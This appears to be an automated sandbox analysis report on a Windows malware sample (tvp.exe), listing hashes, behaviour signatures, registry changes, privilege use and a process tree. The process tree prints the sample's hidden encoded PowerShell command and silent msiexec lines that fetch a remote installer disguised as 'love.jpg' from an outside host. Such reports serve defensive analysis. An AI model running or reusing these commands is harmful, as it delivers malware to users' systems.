50fa244bace65606484686c0468c38c07cacf8d51dd4be774e231dc94b63371c

General

Target

Res/tvp.exe
Size

228KB
MD5

de2052aae5a5915d09d9d1ede714865c
SHA1

2161a471b598ea002fc2a1cc4b65dbb8da14a88e
SHA256

1d3f51b33070b5b8f11c891bb160f5f737151f3a36c2e24f96c2844b089a5294
SHA512

914eb403bc0662266e9b00f52da192463ae782c301be5279579fe88924451fa8b38a9cc9e689499ae7240259e7c03310980f06a5f7cd1b90bda0b3948fb5d1b3
SSDEEP

3072:0QUurm/I/Pc1fsrHxbGL+9QD2pkIanLqf0bAadkp2guonxKzjMMDE0BB6p2wkLqj:lRrXECWDianeuonmRankL

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

msiexec.exe

flow pid process

4 616 msiexec.exe
6 616 msiexec.exe
7 616 msiexec.exe
Use of msiexec (install) with remote resource 3 IoCs

Processes:

msiexec.exemsiexec.exemsiexec.exe

pid process

2956 msiexec.exe
1684 msiexec.exe
2120 msiexec.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

flow	pid	process
4	616	msiexec.exe
6	616	msiexec.exe
7	616	msiexec.exe

pid	process
2956	msiexec.exe
1684	msiexec.exe
2120	msiexec.exe

Modifies registry class 10 IoCs

Processes:

tvp.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open\command	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell	tvp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Res\\tvp.exe %1"	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open	tvp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.dvd\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Res\\tvp.exe -dvd %1"	tvp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\totalplayer.file\shell\open\command	tvp.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

PowerShell.exepowershell.exepowershell.exepowershell.exe

pid	process
1152	PowerShell.exe
1152	PowerShell.exe
1152	PowerShell.exe
1152	PowerShell.exe
1152	PowerShell.exe
1152	PowerShell.exe
1152	PowerShell.exe
2320	powershell.exe
2080	powershell.exe
2896	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

PowerShell.exepowershell.exepowershell.exepowershell.exemsiexec.exemsiexec.exemsiexec.exemsiexec.exe

description	pid	process
Token: SeDebugPrivilege	1152	PowerShell.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeShutdownPrivilege	1684	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1684	msiexec.exe
Token: SeShutdownPrivilege	2120	msiexec.exe
Token: SeShutdownPrivilege	2956	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2120	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2956	msiexec.exe
Token: SeRestorePrivilege	616	msiexec.exe
Token: SeTakeOwnershipPrivilege	616	msiexec.exe
Token: SeSecurityPrivilege	616	msiexec.exe
Token: SeCreateTokenPrivilege	1684	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1684	msiexec.exe
Token: SeLockMemoryPrivilege	1684	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1684	msiexec.exe
Token: SeMachineAccountPrivilege	1684	msiexec.exe
Token: SeTcbPrivilege	1684	msiexec.exe
Token: SeSecurityPrivilege	1684	msiexec.exe
Token: SeTakeOwnershipPrivilege	1684	msiexec.exe
Token: SeLoadDriverPrivilege	1684	msiexec.exe
Token: SeSystemProfilePrivilege	1684	msiexec.exe
Token: SeSystemtimePrivilege	1684	msiexec.exe
Token: SeProfSingleProcessPrivilege	1684	msiexec.exe
Token: SeIncBasePriorityPrivilege	1684	msiexec.exe
Token: SeCreatePagefilePrivilege	1684	msiexec.exe
Token: SeCreatePermanentPrivilege	1684	msiexec.exe
Token: SeBackupPrivilege	1684	msiexec.exe
Token: SeRestorePrivilege	1684	msiexec.exe
Token: SeShutdownPrivilege	1684	msiexec.exe
Token: SeDebugPrivilege	1684	msiexec.exe
Token: SeAuditPrivilege	1684	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1684	msiexec.exe
Token: SeChangeNotifyPrivilege	1684	msiexec.exe
Token: SeRemoteShutdownPrivilege	1684	msiexec.exe
Token: SeUndockPrivilege	1684	msiexec.exe
Token: SeSyncAgentPrivilege	1684	msiexec.exe
Token: SeEnableDelegationPrivilege	1684	msiexec.exe
Token: SeManageVolumePrivilege	1684	msiexec.exe
Token: SeImpersonatePrivilege	1684	msiexec.exe
Token: SeCreateGlobalPrivilege	1684	msiexec.exe
Token: SeCreateTokenPrivilege	2120	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2120	msiexec.exe
Token: SeLockMemoryPrivilege	2120	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2120	msiexec.exe
Token: SeMachineAccountPrivilege	2120	msiexec.exe
Token: SeTcbPrivilege	2120	msiexec.exe
Token: SeSecurityPrivilege	2120	msiexec.exe
Token: SeTakeOwnershipPrivilege	2120	msiexec.exe
Token: SeLoadDriverPrivilege	2120	msiexec.exe
Token: SeSystemProfilePrivilege	2120	msiexec.exe
Token: SeSystemtimePrivilege	2120	msiexec.exe
Token: SeProfSingleProcessPrivilege	2120	msiexec.exe
Token: SeIncBasePriorityPrivilege	2120	msiexec.exe
Token: SeCreatePagefilePrivilege	2120	msiexec.exe
Token: SeCreatePermanentPrivilege	2120	msiexec.exe
Token: SeBackupPrivilege	2120	msiexec.exe
Token: SeRestorePrivilege	2120	msiexec.exe
Token: SeShutdownPrivilege	2120	msiexec.exe
Token: SeDebugPrivilege	2120	msiexec.exe
Token: SeAuditPrivilege	2120	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2120	msiexec.exe
Token: SeChangeNotifyPrivilege	2120	msiexec.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

tvp.exe

pid process

2192 tvp.exe
2192 tvp.exe
2192 tvp.exe

pid	process
2192	tvp.exe
2192	tvp.exe
2192	tvp.exe

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

tvp.exePowerShell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2192 wrote to memory of 1152	2192	tvp.exe	PowerShell.exe
PID 2192 wrote to memory of 1152	2192	tvp.exe	PowerShell.exe
PID 2192 wrote to memory of 1152	2192	tvp.exe	PowerShell.exe
PID 2192 wrote to memory of 1152	2192	tvp.exe	PowerShell.exe
PID 1152 wrote to memory of 2320	1152	PowerShell.exe	powershell.exe
PID 1152 wrote to memory of 2320	1152	PowerShell.exe	powershell.exe
PID 1152 wrote to memory of 2320	1152	PowerShell.exe	powershell.exe
PID 1152 wrote to memory of 2320	1152	PowerShell.exe	powershell.exe
PID 1152 wrote to memory of 2896	1152	PowerShell.exe	powershell.exe
PID 1152 wrote to memory of 2896	1152	PowerShell.exe	powershell.exe
PID 1152 wrote to memory of 2896	1152	PowerShell.exe	powershell.exe
PID 1152 wrote to memory of 2896	1152	PowerShell.exe	powershell.exe
PID 1152 wrote to memory of 2080	1152	PowerShell.exe	powershell.exe
PID 1152 wrote to memory of 2080	1152	PowerShell.exe	powershell.exe
PID 1152 wrote to memory of 2080	1152	PowerShell.exe	powershell.exe
PID 1152 wrote to memory of 2080	1152	PowerShell.exe	powershell.exe
PID 2080 wrote to memory of 2956	2080	powershell.exe	msiexec.exe
PID 2080 wrote to memory of 2956	2080	powershell.exe	msiexec.exe
PID 2080 wrote to memory of 2956	2080	powershell.exe	msiexec.exe
PID 2080 wrote to memory of 2956	2080	powershell.exe	msiexec.exe
PID 2080 wrote to memory of 2956	2080	powershell.exe	msiexec.exe
PID 2080 wrote to memory of 2956	2080	powershell.exe	msiexec.exe
PID 2080 wrote to memory of 2956	2080	powershell.exe	msiexec.exe
PID 2320 wrote to memory of 1684	2320	powershell.exe	msiexec.exe
PID 2320 wrote to memory of 1684	2320	powershell.exe	msiexec.exe
PID 2320 wrote to memory of 1684	2320	powershell.exe	msiexec.exe
PID 2320 wrote to memory of 1684	2320	powershell.exe	msiexec.exe
PID 2320 wrote to memory of 1684	2320	powershell.exe	msiexec.exe
PID 2320 wrote to memory of 1684	2320	powershell.exe	msiexec.exe
PID 2320 wrote to memory of 1684	2320	powershell.exe	msiexec.exe
PID 2896 wrote to memory of 2120	2896	powershell.exe	msiexec.exe
PID 2896 wrote to memory of 2120	2896	powershell.exe	msiexec.exe
PID 2896 wrote to memory of 2120	2896	powershell.exe	msiexec.exe
PID 2896 wrote to memory of 2120	2896	powershell.exe	msiexec.exe
PID 2896 wrote to memory of 2120	2896	powershell.exe	msiexec.exe
PID 2896 wrote to memory of 2120	2896	powershell.exe	msiexec.exe
PID 2896 wrote to memory of 2120	2896	powershell.exe	msiexec.exe

C:\Users\Admin\AppData\Local\Temp\Res\tvp.exe
"C:\Users\Admin\AppData\Local\Temp\Res\tvp.exe"
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2192
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -nop -exec bypass -w Hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMwA7ACQAaQArACsAKQANAAoAewANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFYAZQByAGIAIAByAHUAbgBBAHMAIAAnAG0AcwBpAGUAeABlAGMAIAAvAGkAIABoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaABhAGMAawAuAGMAbwBtAC8AbQBuAHcATwBEAEIAcAB0AEsANgBqAFUALwA2ADIAOABmAHIAQQBMAHQAQQBjAG0ATwAvAG0AYQBpAG4ALwBsAG8AdgBlAC4AagBwAGcAIAAvAHEAJwANAAoAfQANAAoA
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1152
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2320
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
      4⤵
      Use of msiexec (install) with remote resource
      Suspicious use of AdjustPrivilegeToken
      PID:1684
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2896
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
      4⤵
      Use of msiexec (install) with remote resource
      Suspicious use of AdjustPrivilegeToken
      PID:2120
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" msiexec /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2080
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /i http://raw.githack.com/mnwODBptK6jU/628frALtAcmO/main/love.jpg /q
      4⤵
      Use of msiexec (install) with remote resource
      Suspicious use of AdjustPrivilegeToken
      PID:2956

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:616

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

1

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K5Y0E671H5CBO1RMZPUZ.temp

Filesize
7KB

MD5
5d054ae98bfc2beef8596f4b1434b517

SHA1
e4a8bc423c39decd84ddf0830e683e24f99ab48a

SHA256
9962c837d7558e6d88df61c9eb8c67cf147716de963a4aa9c5080f3cc11a70a3

SHA512
ab39b7b2dd2a6c7290f6d0ce316f88028afb041c6d633907452c933fae5f8172ff1a1d87a3552cfeaa591642eac49ae89ead6f5a4ed3d27bad24611e67d5dcc9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
5d054ae98bfc2beef8596f4b1434b517

SHA1
e4a8bc423c39decd84ddf0830e683e24f99ab48a

SHA256
9962c837d7558e6d88df61c9eb8c67cf147716de963a4aa9c5080f3cc11a70a3

SHA512
ab39b7b2dd2a6c7290f6d0ce316f88028afb041c6d633907452c933fae5f8172ff1a1d87a3552cfeaa591642eac49ae89ead6f5a4ed3d27bad24611e67d5dcc9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
5d054ae98bfc2beef8596f4b1434b517

SHA1
e4a8bc423c39decd84ddf0830e683e24f99ab48a

SHA256
9962c837d7558e6d88df61c9eb8c67cf147716de963a4aa9c5080f3cc11a70a3

SHA512
ab39b7b2dd2a6c7290f6d0ce316f88028afb041c6d633907452c933fae5f8172ff1a1d87a3552cfeaa591642eac49ae89ead6f5a4ed3d27bad24611e67d5dcc9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
5d054ae98bfc2beef8596f4b1434b517

SHA1
e4a8bc423c39decd84ddf0830e683e24f99ab48a

SHA256
9962c837d7558e6d88df61c9eb8c67cf147716de963a4aa9c5080f3cc11a70a3

SHA512
ab39b7b2dd2a6c7290f6d0ce316f88028afb041c6d633907452c933fae5f8172ff1a1d87a3552cfeaa591642eac49ae89ead6f5a4ed3d27bad24611e67d5dcc9

Download Submit
memory/1152-58-0x0000000002660000-0x00000000026A0000-memory.dmp

Filesize
256KB

Download
memory/1152-59-0x0000000002660000-0x00000000026A0000-memory.dmp

Filesize
256KB

Download
memory/2192-54-0x0000000000020000-0x000000000003F000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads